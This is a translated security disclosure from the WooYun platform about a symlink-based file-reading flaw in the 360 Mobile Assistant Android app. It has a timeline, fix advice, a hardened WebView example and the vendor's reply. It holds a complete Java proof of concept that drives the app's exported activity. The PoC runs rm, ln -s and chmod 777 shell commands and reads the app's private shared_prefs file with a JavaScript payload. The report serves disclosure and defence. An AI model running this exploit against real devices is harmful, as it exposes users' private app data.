Vulnerability Details

Disclosure status:

2014-01-18: Details sent to the vendor; awaiting the vendor's handling
2014-01-19: Vendor has confirmed; details disclosed to the vendor only
2014-01-22: Details opened to third-party security partners
2014-01-29: Details disclosed to core white hats and experts in related fields
2014-02-08: Details disclosed to regular white hats
2014-02-28: Details disclosed to intern white hats
2014-04-18: Details disclosed to the public

Brief description:

Reportedly the app has an install base of several hundred million.

Detailed description:

By using a symbolic link, the restriction imposed by the file same-origin policy can be bypassed: the com.qihoo.lightapp.WebAppFakeBrowserLightActivity component is invoked to parse and execute a specially prepared JavaScript script, which can then read the contents of any private file.

For the exploitation technique, refer to the recently published Firefox vulnerability of the same class; see: https://viaforensics.com/mobile-security/chained-vulnerabilities-firefox-android-pimp-browser.html

The PoC is as follows (adapted from x3xtxt's code):

// The imports, class header and the opening of onCreate() are not part of the report's
// listing (which starts inside onCreate()); they are added here so the fragment compiles.
import android.app.Activity;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.view.Menu;

import java.io.FileOutputStream;

public class MainActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // Private file of the target app that the PoC reads through the target's WebView.
        String sensitive_file_name = "/data/data/com.qihoo.appstore/shared_prefs/common_config.xml";

        DP_WebViewReadAnyFilePoC(sensitive_file_name);
    }

    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        // Inflate the menu; this adds items to the action bar if it is present.
        getMenuInflater().inflate(R.menu.main, menu);
        return true;
    }

    public void DP_WebViewReadAnyFilePoC(String targetfile) {
        try {
            // HTML payload stored in this (attacker) app's private files directory.
            String shell_poc = "/data/data/" + getApplicationContext().getPackageName() + "/files/shellpoc.html";

            // Write the payload and make it world-readable so the target app can load it.
            write_payload_file();
            cmdexec(new String[] {"/system/bin/chmod", "-R", "777", shell_poc});

            // Ask the target's exported activity to open the payload as a file:// URL.
            String pkgName = "com.qihoo.appstore";
            String activityName = "com.qihoo.lightapp.WebAppFakeBrowserLightActivity";
            String url = "file://" + shell_poc;

            Intent intent = new Intent();
            intent.setAction("com.qihoo.light.action.WEBAPP_LINK");
            intent.setComponent(new ComponentName(pkgName, activityName));
            intent.setData(Uri.parse(url));
            startActivity(intent);

            // Let the WebView load the page (its script waits 4 s before issuing the XHR).
            Thread.sleep(2000);

            // Replace the loaded file with a symlink to the target file; the page's XHR to
            // location.href then follows the link and returns the target's contents.
            cmdexec(new String[] {"/system/bin/rm", shell_poc});
            cmdexec(new String[] {"/system/bin/ln", "-s", targetfile, shell_poc});
            cmdexec(new String[] {"/system/bin/chmod", "-R", "777", shell_poc});

            Thread.sleep(5000);

            // Remove the symlink afterwards.
            cmdexec(new String[] {"/system/bin/rm", shell_poc});
        } catch (Exception e) {
            debugInfo(e.getMessage());
        }
    }

    @SuppressWarnings("deprecation")
    public void write_payload_file() {
        // Script that, after a 4 s delay, fetches its own URL (location.href) via XHR
        // and shows the response body in an alert.
        String payloadStr = "function getContent(){ \n" +
                "  var url = location.href; \n" +
                "  var xmlhttp; \n" +
                "  if(window.XMLHttpRequest){ \n" +
                "    xmlhttp=new XMLHttpRequest(); \n" +
                "  }else{ \n" +
                "    xmlhttp=new ActiveXObject(\"Microsoft.XMLHTTP\"); \n" +
                "  } \n" +
                " \n" +
                "  xmlhttp.onreadystatechange=function() \n" +
                "  { \n" +
                "    if (xmlhttp.readyState==4) \n" +
                "    { \n" +
                "      alert(xmlhttp.responseText); \n" +
                "    } \n" +
                "  } \n" +
                "  xmlhttp.open(\"GET\",url,true); \n" +
                "  xmlhttp.send(); \n" +
                "} \n" +
                " \n" +
                "setTimeout(getContent,4000); \n";

        String htmlStr = "<html> \n" +
                "<head><title>Steal Sensitive Information PoC</title></head> \n" +
                "<body> \n" +
                "  <script type=\"text/javascript\"> \n" +
                payloadStr +
                "  </script> \n" +
                "</body> \n" +
                "</html>";

        try {
            // MODE_WORLD_READABLE is deprecated but is what the PoC relies on.
            FileOutputStream fOut = openFileOutput("shellpoc.html", Context.MODE_WORLD_READABLE);
            fOut.write(htmlStr.getBytes());
            fOut.close();
        } catch (Exception e) {
            debugInfo(e.getMessage());
        }
    }

    public void cmdexec(String[] cmd) {
        try {
            Runtime.getRuntime().exec(cmd);
        } catch (Exception e) {
            debugInfo(e.getMessage());
        }
    }

    // Not shown in the report's listing; assumed to be a plain logging helper.
    private void debugInfo(String msg) {
        Log.d("PoC", String.valueOf(msg));
    }
}

Proof of vulnerability:

(screenshot: 2.jpg)

Fix recommendation:

Restrict symbolic links.
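One way a WebView-hosting activity can apply that restriction on the receiving side, given here as an added example that is neither the vendor's patch nor code from the original report (the class name, and the choice to accept local files only from the app's own files directory, are assumptions):

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebSettings;
import android.webkit.WebView;

import java.io.File;
import java.io.IOException;

// Added example of a hardened "light app" activity; assumed names, not the vendor's code.
public class HardenedWebAppActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);
        setContentView(webView);

        WebSettings settings = webView.getSettings();
        // Locked-down defaults: no script, no file system access, and no file-to-file
        // reads (the two *FromFileURLs switches exist since API 16).
        settings.setJavaScriptEnabled(false);
        settings.setAllowFileAccess(false);
        settings.setAllowFileAccessFromFileURLs(false);
        settings.setAllowUniversalAccessFromFileURLs(false);

        Intent intent = getIntent();
        Uri target = (intent == null) ? null : intent.getData();
        if (target == null) {
            finish();
            return;
        }

        String scheme = target.getScheme();
        if ("http".equalsIgnoreCase(scheme) || "https".equalsIgnoreCase(scheme)) {
            // Remote light-app pages may run script; they still cannot reach file://.
            settings.setJavaScriptEnabled(true);
            webView.loadUrl(target.toString());
        } else if ("file".equalsIgnoreCase(scheme) && isOwnRegularFile(getFilesDir(), target)) {
            // Local content is rendered without script, so even if the file is later
            // swapped for a symlink the page has no XHR with which to read through it.
            settings.setAllowFileAccess(true);
            webView.loadUrl(target.toString());
        } else {
            // Files in other apps' directories, symlinks and unknown schemes are refused.
            finish();
        }
    }

    /**
     * True only if uri names an existing regular file under ownFilesDir that is not itself
     * a symbolic link. The parent directory is canonicalised first so a symlinked
     * /data/data (as on newer Android builds) does not cause a false rejection.
     */
    static boolean isOwnRegularFile(File ownFilesDir, Uri uri) {
        String path = uri.getPath();
        if (path == null || path.isEmpty()) {
            return false;
        }
        try {
            File file = new File(path).getAbsoluteFile();
            File parent = file.getParentFile();
            if (parent == null) {
                return false;
            }
            File viaCanonicalParent = new File(parent.getCanonicalFile(), file.getName());
            // For a symlink the canonical form resolves somewhere other than the name itself.
            boolean isSymlink = !viaCanonicalParent.getCanonicalFile()
                    .equals(viaCanonicalParent.getAbsoluteFile());
            String root = ownFilesDir.getCanonicalPath() + File.separator;
            return !isSymlink
                    && file.isFile()
                    && viaCanonicalParent.getCanonicalPath().startsWith(root);
        } catch (IOException e) {
            return false;
        }
    }
}
```

The path check alone is a point-in-time test and the report's technique swaps the file after the load has started, so the check is paired with WebView settings that remove the read primitive: local pages get no JavaScript, and file-from-file and universal access are off, which is what actually closes the symlink race. Rejecting any file:// path outside the app's own files directory additionally stops the exported activity from rendering content another app placed in its own private storage.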

Copyright notice: when reposting, please credit the source: 燕子侠@乌云


Vulnerability Response

Vendor response:

Severity: Low

Vulnerability Rank: 1

Confirmed at: 2014-01-19 20:06

Vendor reply:

Latest status:

2014-01-19: Thanks to the WooYun platform and 燕子侠 for the vulnerability information. This is not a vulnerability in 360 Mobile Assistant but in Android's native WebView, and it can only be maliciously exploited with root privileges or when a malicious app is present locally. We have already released a new version with the fix; users only need to upgrade. Links to the new version: web download page: http://www.360.cn/shoujizhushou/index.html WAP download pages: http://m.360.cn/zs http://m.360.cn/nwap/baohe.html file download link: http://down.360safe.com/360mobilemgr/360box_web.apk


Vulnerability assessment: